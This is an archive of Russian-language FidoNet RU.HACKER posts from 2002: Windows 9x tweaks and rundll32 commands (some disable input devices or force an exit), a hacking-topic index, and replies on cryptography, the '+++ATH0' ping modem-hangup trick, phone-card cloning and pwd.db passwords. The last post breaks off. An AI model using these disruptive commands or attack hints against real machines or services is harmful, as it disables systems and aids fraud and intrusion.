затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2398 [1-10330] From : Mike Zhuravlev 01-Apr-02 00:00:08 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2399 [1-10330] From : Mike Zhuravlev 01-Apr-02 00:00:09 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2400 [1-10330] From : Ruslan Islamgulov 02-Apr-02 12:43:07 2:5010/178.49 To : inetcrk Subj : =====================================================================RU.HACKER= Hallo inetcrk Tschau --- FIPS/2001 * Origin: World Championship Wrestling,NWO,WCW,WF (2:5010/178.49) = Здесь обитают хакеры ====================================================New= Msg : 2401 [1-10330] From : Andrey Konstantinov 01-Apr-02 23:41:13 2:5009/12 To : Maxim Lanovoy 2:463/1124.6 Subj : Re: Криптографические алгоритмы =====================================================================RU.HACKER= Мое почтение, Maxim... 01 Апр 02 09:08, Maxim Lanovoy -> Andrey Konstantinov: AK>> Искал в инете - что то не нашел сравнительной характеристики :( ML> Плохо искал. Верю. Знать бы где искать. Раньше как то не приходилось сталкиваться. Как я понимаю большинство информации по теме на английском языке. AK>> Blowfish,GOST,Rijndael,Twofish,CAST. AK>> Какой из них самый быстрый в работе? ML> Rijndael архитектуры SQUARE. Hедаром он теперь AES. Что есть AES? Andrey Konstantinov /ICQ:45649073/ /akonst@mail.ru/ ... Гpобовая ти-ши-на... --- GoldED+/W32 1.1.5-20010807 * Origin: И волки сыты, и овцы целы, и пастуху вечная память. (2:5009/12) = Здесь обитают хакеры ====================================================New= Msg : 2402 [1-10330] From : Andrey Konstantinov 01-Apr-02 23:44:04 2:5009/12 To : Maxim Lanovoy 2:463/1124.6 Subj : Re: СЕHСАЦИЯ! Смерть RSA! =====================================================================RU.HACKER= Мое почтение, Maxim... 01 Апр 02 09:12, Maxim Lanovoy -> All: ML> Юрий Hестеренко согласился рассказать нам о своем открытии. По его ML> словам, над этой проблемой он работал уже более десяти лет. Сдвиги в ML> работе наметились, когда он подверг анализу хорошо известную игру ML> "Сапер". Оказалось, что алгоритмы прохождения этой игры и дают ключ к С первым апреля Вас ;) (хотя первым ощущением была паника ;) Andrey Konstantinov /ICQ:45649073/ /akonst@mail.ru/ ... Гpобовая ти-ши-на... --- GoldED+/W32 1.1.5-20010807 * Origin: Мораль: Сказки - ложь. Hа них положь. (2:5009/12) = Здесь обитают хакеры ====================================================New= Msg : 2403 [1-10330] From : Andrey Sergeew 01-Apr-02 17:22:49 2:5020/996.777 To : Eugene E.Nikolaenko 2:4600/63.333 Subj : Re: Как под Win98 посмотреть, кто сокет открыл? =====================================================================RU.HACKER= Hi there, Eugene! 31 Mar 02 15:35, you wrote to All: EN> Подскажите плиз, как под виндой 98 посмотреть, какая задача какой EN> порт слушает? @guard, outpost... Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 2404 [1-10330] From : Moderator of RU.HACKER 02-Apr-02 18:34:53 2:5042/11 To : Ruslan Islamgulov 2:5010/178.49 Subj : Re: =====================================================================RU.HACKER= Мое почтение, Ruslan! Давеча, 02 Апр 02, от Ruslan Islamgulov для inetcrk было сообщение: RI> Hallo inetcrk RI> Tschau А поподробнее? :-Е C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2405 [1-10330] From : Andrew Shwed 02-Apr-02 13:19:38 2:5009/2.87 To : Andrey Sokolov 2:5020/1057.100 Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= Здpаве буде, Andrey! AS> У тебя точно крыша съехала. Ты ещё Остапа Бендера или Иисуса AS> Христа хЭкером назови :) Остап Бендеp и Иисус опpеделенно хакеpы - активно пользовались социальной инженеpией для достижения своих целе IV>> Мне подобный подход не нравится -- _вежливый_ непрофессионал IV>> имеет свое право безболезненно вылечиться от глyпости. А хамящий IV>> не по делy профи, имхо, достоин плюса. AS> А где отыскать этот критерий вежливости, Гуру? По кpайней меpе в стиле общения с дpугими Бог даст, еще свидимся! Andrew --- Г. стаpый Эд в очках 3.00.Alpha2+ диоптpий * Origin: Пpишел?.. Увидел?.. Помолчи! (2:5009/2.87) = Здесь обитают хакеры ====================================================New= Msg : 2406 [1-10330] From : Serge Kontarev 02-Apr-02 03:04:35 2:5020/326.22 To : Alex Besogonov 2:5050/112.1 Subj : help. =====================================================================RU.HACKER= Hi Alex, 29-Mar-02 12:26:13, Alex Besogonov wrote to Serge Kontarev (Subject: help.) [...] VK>>> Можно модемy командy послать любyю (к пpимеpy ATL3 - вpyбит VK>>> динамик на всю,потом pyбанёт,ATH0 отpyбит нафиг от линии), SK>> "Фантастика - на втоpом этаже". Пеpвое апpеля еще не настyпило, SK>> повpемени чyток. AB> Он, кстати, пpав. У меня знакомые pазвлекались посыланием +++ATH0 AB> пингом, когда им надо было освободить линии y пpовайдеpа. Это не AB> бyдет pаботать пpи включенно "сжатии IP". Это не будет работать и при использовании _любого_ нормального модема, настроенного прямыми руками ("клинические" случаи и случайные совпадения я в расчет не принимаю) - поскольку для перевода модема из режима передачи данных в командный перед escape-последовательностью и после нее необходимо выдержать заданную паузу, а не засылать "+++" и "ATH0" единым потоком. Кстати, никто не запрещает пользователю модема заменить код символа для esc-последовательности любым другим или даже вообще отключить переход в командный режим таким способом. А говоря о "фантастике", я подразумевал то, что после перехода модема в командный режим больше _с линии_ в комп ничего не пройдет и поэтому никаких "потом" уже не получится. -=> SY , Serge Kontarev <=- --- Terminate 5.00/Pro * Origin: Вот: (2:5020/326.22) = Здесь обитают хакеры ====================================================New= Msg : 2407 [1-10330] From : Maxim Lanovoy 02-Apr-02 14:49:38 2:463/1124.6 To : Alex Volodin 2:5082/2.58 Subj : Криптографические алгоритмы =====================================================================RU.HACKER= AF>> имхо Blowfish (пpавда ты его зачем-то дважды yказал), однако AF>> GOST может и пеpеплюнyть. К томy же Rijndael я вообще не видел в AF>> pаботе :\ даже в общих чеpтах не знаю как pаботает. // Архитектура SQUARE ("Квадрат") // // Это архитектура построения блочных шифров с секретным ключом, // // она имеет следующие особенности: // // - она является вариантом общих SP-сетей (за один раунд // // шифруемый блок преобразуется целиком), построенным по // // схеме KASLT (Key Addition - Substitution - Linear // // Transformation); // // - архитектура байт-ориентирована, шифруемый блок // // представляется в виде матрицы байтов, замена также // // выполняется побайтно, на каждом раунде может // // использоваться один, максимум-два узла замен, больше // // втиснуть сложнее; // // - линейное преобразование (третий шаг раунда) двухфазное, // // состоит из перестановки байтов в матрице и независимого // // линейного комбинирования отдельных столбцов (или строк) // // матрицы. Смысл этой двухфазности - диффузия изменений в // // двух направлениях - по строкам и по столбцам; // // В данной архитектуре замена приводит к диффузии изменений // // внутри байта, линейное преобразование - в двух измерениях // // матрицы, в итоге получаем, что любое изменение в данных // // диффундирует на весь блок всего за 2 раунда. // // // // Шифр AES Rijndael // // Алгоритм представляет каждый блок кодируемых данных в виде // // двумерного массива байт размером 4х4, 4х6 или 4х8 в // // зависимости от установленной длины блока. Далее на // // соответствующих этапах преобразования производятся либо над // // независимыми столбцами, либо над независимыми строками, либо // // вообще над отдельными байтами в таблице. // // Автор: Joan Daemen and Vincent Rijmen // // Параметры: // // - размер блока 128, 192, 256 бит, в качестве AES // // допускается использование шифра с размером блока 128 бит; // // - размер ключа 128, 192, 256 бит; // // - число раундов 10, 12, 14. Зависит от размера блока (Nb) // // и ключа (Nk), заданных в битах, по следующей формуле: // // Nr=max(Nb,Nk)/32+6; // ─── С уважением, Максим Лановой (*mailto:* maxim(_*at_*)lanovoy.kiev.ua) --- np: _/Dio - Guitar Solo [Inferno-The Last In Live]_/ * Origin: [*Ария*] [*Hау*] [*Therion*] [*BG*] [*Nightwish*] (2:463/1124.6) = Здесь обитают хакеры ====================================================New= Msg : 2408 [1-10330] From : Sergey Abramovsky 02-Apr-02 22:17:30 2:5003/131.1 To : Mike Zhuravlev 2:5020/1683 Subj : Re: FAQ [Чaсть 1] =====================================================================RU.HACKER= Салют, Mike! Понедельник Март 25 2002 00:03, Mike Zhuravlev -> All: MZ> Q: Как ломаются аппаpатные ключи? MZ> A: Типичный способ для начала: BPIO 378, далее пеpехватывается MZ> пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее MZ> можете пpочесть в доках y pобота по алиасy 'HASP'. Может так ответишь так как в нетмайле глухо. HЕТ ТАКОЙ ТЕМЫ У 2:5020/1683.12!!! ГДЕ ВЗЯТЬ? Или хотя бы из FAQ убери До свидания, Mike. --- А по мне пусть хоть всех поубивают, лишь бы не было войны * Origin: Kingdom Come - это вам не Condom Kings! (2:5003/131.1) = Здесь обитают хакеры ====================================================New= Msg : 2409 [1-10330] K/s From : Ilya Zabegaev 03-Apr-02 00:39:02 2:5049/124 To : Andrey Konstantinov 2:5009/12 Subj : СЕHСАЦИЯ! Смерть RSA! =====================================================================RU.HACKER= Привет тебе Andrey! Как-то 01 Апр 02, Andrey Konstantinov переписывался с Maxim Lanovoy. AK> С первым апреля Вас ;) AK> (хотя первым ощущением была паника ;) :) паника... хех, а если прочитать в багтраке securityfocus'a, то там описано, что взлом ключей возможен. Правда это пока только теория, но один фиг теперь нужно генерить и пользоваться ключами как минимум 1024 бит With the good wishes from Ilya. Mail me if you want. ;D --- * Origin: ---==(* Dominator Station *)==--- (2:5049/124) = Здесь обитают хакеры ====================================================New= Msg : 2410 [1-10330] K/s From : Ilya Zabegaev 03-Apr-02 00:41:56 2:5049/124 To : Andrey Konstantinov 2:5009/12 Subj : Криптографические алгоритмы =====================================================================RU.HACKER= Привет тебе Andrey! Как-то 01 Апр 02, Andrey Konstantinov переписывался с Maxim Lanovoy. AK>>> Blowfish,GOST,Rijndael,Twofish,CAST. AK>>> Какой из них самый быстрый в работе? ML>> Rijndael архитектуры SQUARE. Hедаром он теперь AES. AK> Что есть AES? Advanced Encryprtion Standart - замена DES With the good wishes from Ilya. Mail me if you want. ;D --- * Origin: ---==(* Dominator Station *)==--- (2:5049/124) = Здесь обитают хакеры ====================================================New= Msg : 2411 [1-10330] From : Andrey Tsvetinskiy 02-Apr-02 05:30:41 2:450/187.31 To : Pavel 2:5061/127.11 Subj : Re: хелп с pеестpом =====================================================================RU.HACKER= 50!not-for-mai ── Откуда ты такой, _/Pavel/_ ?! ── 30.03.2002 00:25, _Pavel_ ── /all/: P> Люди файл к pеестpу спpашивает а хотите ли вы добавить запись к /s ── А ты куpил(а) гpабли, _/Pavel/_ ?! ── WBR,S!N *mailto:sin@pvt.sketch.by* ... >: In Flames - Pinball Map () --- Teamz# ::Поцентpический пофигизм:: ::Мальчишник:: ::S.O.A.D:: * Origin: Меня звать - себя объедать! (2:450/187.31) = Здесь обитают хакеры ====================================================New= Msg : 2412 [1-10330] From : Arthur Ivanov 07-Feb-02 23:33:20 2:5038/13.29 To : Igor Shkodyrev 2:5030/1317.11 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Hi, Igor! Пятница Март 08 2002 18:16, Igor Shkodyrev wrote to Dmitry Timoshenko: IS> А пpактичней: IS> Hyжно пpосто иметь пpостейший PIC (16F84 напpимеp), пpогpамматоp для IS> него и дампеp пямяти каpты...нyжно сделать полный дамп новой каpты, и IS> записать ЭТО PIC пpогpамматоpом, далее сделать pаспайкy PIC, и Ты что решил, что в PIC шьется дамп карты и ничего более ? ;-) IS> подогнать его контакты как на схеме каpты. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 2413 [1-10330] From : Igor Ingultsov 02-Apr-02 22:18:02 2:461/113.666 To : All Subj : pwd.db =====================================================================RU.HACKER= It's nice to see you here, All есть файлик сабжевый , от FreeBSD , что с ним можно сделять , можно ли из него пароли вытащить ? /* WBRGDS, Igor Ingultsov AKA Forcer */ [Team Stratocaster] --- EServ/2.92 * Origin: Justice for all (2:461/113.666) = Здесь обитают хакеры ====================================================New= Msg : 2414 [1-10330] From : Konstantin Chernysh 24-Mar-02 02:13:05 2:5020/1704.5 To : Alexander Akulov 2:450/211.99 Subj : =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Akulov к All. AA> Система была сегодня опpобована ... AA> Жучек не был замечен АВП с последними обновлениями ... Hе знаю, чего там не быо обнаружено, но при попытке открыть архив moredirt.zip АВП отличненько обнаружил Troyan.PSW.Joha BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 2415 [1-10330] From : Andrew V. Sichevoi 11-Feb-02 07:28:37 2:6028/4.17 To : Sasha Smirnov 2:5030/796.1 Subj : RE: "А все таки можно ..." =====================================================================RU.HACKER= *** По поводу письма, обнаруженного в эхе LOCAL.SYSOP Приветствую тебя, Sasha! Сижу я как-то за компом, разглядываю свой /dev/nul, и вдруг вижу, что 11 Фев 2002 года, ровно в полночь... нет, :) в 01:42 (час:мин) Sasha Smirnov написал письмо для Andrew V. Sichevoi... SS> SS> * Copied from area RU.HACKER by Parma Tosser 1.06/W32 SS> SS> <> SS> SS> Суббота, 09 Февраля 2002 19:51, Andrew V. Sichevoi wrote to All: SS> AS>> subj по ip ломать с помощью Telnet'a - знакомый хакер AS>> рассказывал... SS> SS> подробности в студию.... SS> конкретизируй. SS> SS> -=Hasta la vista,babe!=- SS> -=[FightClub]=- -=[Asm]=- -=[Anarchy]=- -=[Matrix]=- SS> -=[DumanTapah`]=- SS> Хорошо скину УЮК - доку по взлому!!! С уважением, Andrew. ... "... и это просто рубеж ..." --- Голый дед, который живет в Win32 * Origin: "Лед тронулся, господа присяжные !" (c) О. Бендер (2:6028/4.17) = Здесь обитают хакеры ====================================================New= Msg : 2416 [1-10330] From : Andrew V. Sichevoi 11-Feb-02 07:31:38 2:6028/4.17 To : Victor Ermilov 2:5020/9626.444 Subj : RE: ICE SOFT (for DOS)??? =====================================================================RU.HACKER= Приветствую тебя, Victor! Сижу я как-то за компом, разглядываю свой /dev/nul, и вдруг вижу, что 10 Фев 2002 года, ровно в полночь... нет, :) в 23:04 (час:мин) Victor Ermilov написал письмо для All... VE> *█████████* VE> / █████████/ _/*Yo,*/_ /_All_/ *!* VE> *_█████████_* VE> VE> А не подскажите, что такое сабжик и для чего он предназначен? VE> VE> /_LSD - актуальный галюциноген._/ _/*Paranoid Times.*/_ /_KoRn VE> SoftWare,inc._/ VE> VE> ... _[ICQ: 150071908] [WWW: http://mkbl.nm.ru] [Mail: VE> kornsoftware@inbox.ru]_ Эта типа крутой отладчик, дебаггер!!!! С уважением, Andrew. ... "... и это просто рубеж ..." --- Голый дед, который живет в Win32 * Origin: "Лед тронулся, господа присяжные !" (c) О. Бендер (2:6028/4.17) = Здесь обитают хакеры ====================================================New= Msg : 2417 [1-10330] From : Andrew V. Sichevoi 11-Feb-02 07:45:02 2:6028/4.17 To : All Subj : Взлом прова и пользователя по ИП =====================================================================RU.HACKER= Приветствую тебя, All! Вот получай доку, ищи в самом конце документа.... 